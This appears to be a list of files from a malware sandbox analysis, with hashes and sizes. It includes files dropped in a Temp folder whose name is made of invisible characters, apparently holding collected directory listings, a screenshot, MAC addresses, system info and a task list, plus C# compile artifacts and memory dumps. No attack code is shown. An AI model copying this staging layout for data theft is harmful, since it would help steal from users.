72ebf3ab1f63b6c87c3c961a8896f34a88e3b20cd4d71cb446c41504ce5cb8e2

SHA512
08b165cd3fb54a6f99cce975b4b52a24cc2f064123d2aee81bb93f0eef5f55c1b1e58ff05a8b02c9ab0c553e477fb004d0a188e04d0e4cf3dbca42ccfcca0d50

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‌ ‌ \Directories\Downloads.txt

Filesize
819B

MD5
17a53da14011d58fa4e5cc242b45938b

SHA1
22607b5b95eb73e73cf32c4f5c768cc3dd5e3dd4

SHA256
766e2d6517a7eea6ebe3f3a1582a7f7bd80526f8c6c0aa303b77519a56b99582

SHA512
c3945e4cd7c6e94872c9505608000ac1adfeffb270f88ffd34adf91a25a5056169b8cc330925ad9b74d69523703399b73b2cd069e08ef0f3fc6f8675ea8f614b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‌ ‌ \Directories\Music.txt

Filesize
738B

MD5
153b4d7cf9ed775310fdec02e1e234d6

SHA1
97bc07624992ee5391c57b68483f37cf3e7b8319

SHA256
d53e8b4f2f3efdcfc06e1992835577d7924f208cf6160168fabe85e2677c934b

SHA512
06119d1c23c84c9bf09d9bf2a60596ccabda14376a6db920ded2d64707e13996501a13f091c27d636e098304cb2ffefadb727fb80ef745a96a25eaaaa4b317f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‌ ‌ \Directories\Pictures.txt

Filesize
999B

MD5
bebac5102b05c160172550aab30c353a

SHA1
06953d8b242a4f7a914fd51cc0517f06d64c7571

SHA256
8c8af8a7b2f61869ae5b7fc85878656a93cc0f4aee75f446b94ffda0933214d8

SHA512
e997b74ae8917ad9d02586bdef9b977eefeca6ce9c0ef6c6cfd3a234f6f0bb78f44ed4a3c7a047bbeb95ad99e07f02a49e045cb466df6d0100f7c4a049d53259

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‌ ‌ \Directories\Videos.txt

Filesize
30B

MD5
e140e10b2b43ba6f978bee0aa90afaf7

SHA1
bbbeb7097ffa9c2daa3206b3f212d3614749c620

SHA256
c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

SHA512
df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‌ ‌ \Display (1).png

Filesize
427KB

MD5
4986a93c192d497f66ef8f38018f99af

SHA1
14d6889a20a17f0f78457f8dc63756a93f9b51ca

SHA256
b0483509fe9d501ece3d6e8c8cd0f45756b2dc83d8143ad00f675c3ee06f5589

SHA512
47ed3d72cade3919cbf53db4a4d5ed9898163dcb713fd7f9499c9ef455f1c62cda9ecefd50b374dfdbf14d8dc76cb7f945a3b416b3eefe1d0ce41c50d99cbf1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‌ ‌ \System\MAC Addresses.txt

Filesize
232B

MD5
d88f2b4afe7dbec7219f016ded772d0f

SHA1
1d58ae40deaf15e49e3db6b05499926d1d1db9ae

SHA256
d6b0e974cf3b3c52697e08337a12fc27c59e87104e67f0133437e691e1847f2c

SHA512
f6ef6d33cc1ba769dd475e42bc6fbc0f750306b5a2a4b5434e22ed52340dedde82d3cb63d4640726a67138264d90de89ab1610e836d99b73709ebde9268f09c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‌ ‌ \System\System Info.txt

Filesize
2KB

MD5
714bb8bf0629ec29e1e33bf9ff7bb7f5

SHA1
279ed94ea6134128273ae641e24fb31270369210

SHA256
a84d5bc674845cd1380ae1c22f66475df79842128f9b9e4c2fca654456292b2d

SHA512
b9c6233d3669c8a21f76bf0a2f4dc2dd9c5fdff1c3eceefa9266144f7570bc27289a8bda8424b96b68aabe5f3fc462ae0a0d9976e126393d4f7036cfc59f2b0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌‌ ‌ \System\Task List.txt

Filesize
13KB

MD5
8e757aeb4d6f02c13d623f027eba1813

SHA1
aad913cb199b57e74f750bc29758ac4602e329b5

SHA256
8573eb407de6ffdd3a999f6fbd6056e44d20f79911de2d3dd935993dca3a9947

SHA512
a63f23428862a374bc047f6d92b9c2a08274474d81ad15a40c5f70ed9853c61895ebb79189f0a789eb7f4dc9470562b73491ee9f2c3023e9b80156250fd0b417

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xmyaymww\CSC55F2C19A79E460AABAB9EE212D758ED.TMP

Filesize
652B

MD5
6e3bb66f801e640c75e9c1306019b389

SHA1
c056fd58c61525c664a13a22c7d05d0dec08f16e

SHA256
13d2465701ae59980ddd9b6b8ec277c4c3071ccc0cfafac86af591f4a9fc12fd

SHA512
ac30e073a18a2ae1580f33f0c69896d07be739f2626e3a46a62b9015ed4cb0933bacddac9e5b24ac5394fc285cecd11f4827b04553c6ed726a5cfac02e7c1271

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xmyaymww\xmyaymww.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xmyaymww\xmyaymww.cmdline

Filesize
607B

MD5
0ba4b50a11c35f7909b9026c45b952d3

SHA1
ce560a0014dc152df5c1e3eef954de9e33899c46

SHA256
1e3c1c1c52969afc556d7aaa8267d9f92e36f52fe0457da7a3a62a6330b9df15

SHA512
8c2fee6a97247bbf0e41e5ebce33c232e3e7923a41ea6c9ab1aa7807f8972725127d6fdfd780234774862980c90abf13ddadf7142b957bae3232913202352125

Download Submit
memory/1948-95-0x00000201CAED0000-0x00000201CAEF2000-memory.dmp

Filesize
136KB

Download
memory/2240-151-0x0000019DAFAB0000-0x0000019DAFAB8000-memory.dmp

Filesize
32KB

Download
memory/4872-66-0x00007FFE84D80000-0x00007FFE84D8D000-memory.dmp

Filesize
52KB

Download
memory/4872-80-0x00007FFE81190000-0x00007FFE811BD000-memory.dmp

Filesize
180KB

Download
memory/4872-64-0x00007FFE86090000-0x00007FFE860A9000-memory.dmp

Filesize
100KB

Download
memory/4872-141-0x00007FFE719C0000-0x00007FFE71B30000-memory.dmp

Filesize
1.4MB

Download
memory/4872-68-0x00007FFE80E90000-0x00007FFE80EBE000-memory.dmp

Filesize
184KB

Download
memory/4872-62-0x00007FFE719C0000-0x00007FFE71B30000-memory.dmp

Filesize
1.4MB

Download
memory/4872-60-0x00007FFE80F80000-0x00007FFE80FA3000-memory.dmp

Filesize
140KB

Download
memory/4872-84-0x00007FFE860F0000-0x00007FFE86109000-memory.dmp

Filesize
100KB

Download
memory/4872-58-0x00007FFE860F0000-0x00007FFE86109000-memory.dmp

Filesize
100KB

Download
memory/4872-56-0x00007FFE81190000-0x00007FFE811BD000-memory.dmp

Filesize
180KB

Download
memory/4872-50-0x00007FFE86C60000-0x00007FFE86C6F000-memory.dmp

Filesize
60KB

Download
memory/4872-212-0x00007FFE86090000-0x00007FFE860A9000-memory.dmp

Filesize
100KB

Download
memory/4872-31-0x00007FFE81200000-0x00007FFE81224000-memory.dmp

Filesize
144KB

Download
memory/4872-26-0x00007FFE71F20000-0x00007FFE72509000-memory.dmp

Filesize
5.9MB

Download
memory/4872-85-0x00007FFE71520000-0x00007FFE7163C000-memory.dmp

Filesize
1.1MB

Download
memory/4872-108-0x00007FFE80F80000-0x00007FFE80FA3000-memory.dmp

Filesize
140KB

Download
memory/4872-81-0x00007FFE812D0000-0x00007FFE812DD000-memory.dmp

Filesize
52KB

Download
memory/4872-78-0x00007FFE81B40000-0x00007FFE81B54000-memory.dmp

Filesize
80KB

Download
memory/4872-72-0x00007FFE71F20000-0x00007FFE72509000-memory.dmp

Filesize
5.9MB

Download
memory/4872-75-0x00007FFE71640000-0x00007FFE719B5000-memory.dmp

Filesize
3.5MB

Download
memory/4872-76-0x00007FFE81200000-0x00007FFE81224000-memory.dmp

Filesize
144KB

Download
memory/4872-74-0x0000020B0D720000-0x0000020B0DA95000-memory.dmp

Filesize
3.5MB

Download
memory/4872-73-0x00007FFE80D60000-0x00007FFE80E18000-memory.dmp

Filesize
736KB

Download
memory/4872-239-0x00007FFE80E90000-0x00007FFE80EBE000-memory.dmp

Filesize
184KB

Download
memory/4872-240-0x00007FFE80D60000-0x00007FFE80E18000-memory.dmp

Filesize
736KB

Download
memory/4872-241-0x0000020B0D720000-0x0000020B0DA95000-memory.dmp

Filesize
3.5MB

Download
memory/4872-252-0x00007FFE71640000-0x00007FFE719B5000-memory.dmp

Filesize
3.5MB

Download
memory/4872-270-0x00007FFE719C0000-0x00007FFE71B30000-memory.dmp

Filesize
1.4MB

Download
memory/4872-264-0x00007FFE71F20000-0x00007FFE72509000-memory.dmp

Filesize
5.9MB

Download
memory/4872-265-0x00007FFE81200000-0x00007FFE81224000-memory.dmp

Filesize
144KB

Download
memory/4872-279-0x00007FFE71F20000-0x00007FFE72509000-memory.dmp

Filesize
5.9MB

Download
memory/4872-309-0x00007FFE71F20000-0x00007FFE72509000-memory.dmp

Filesize
5.9MB

Download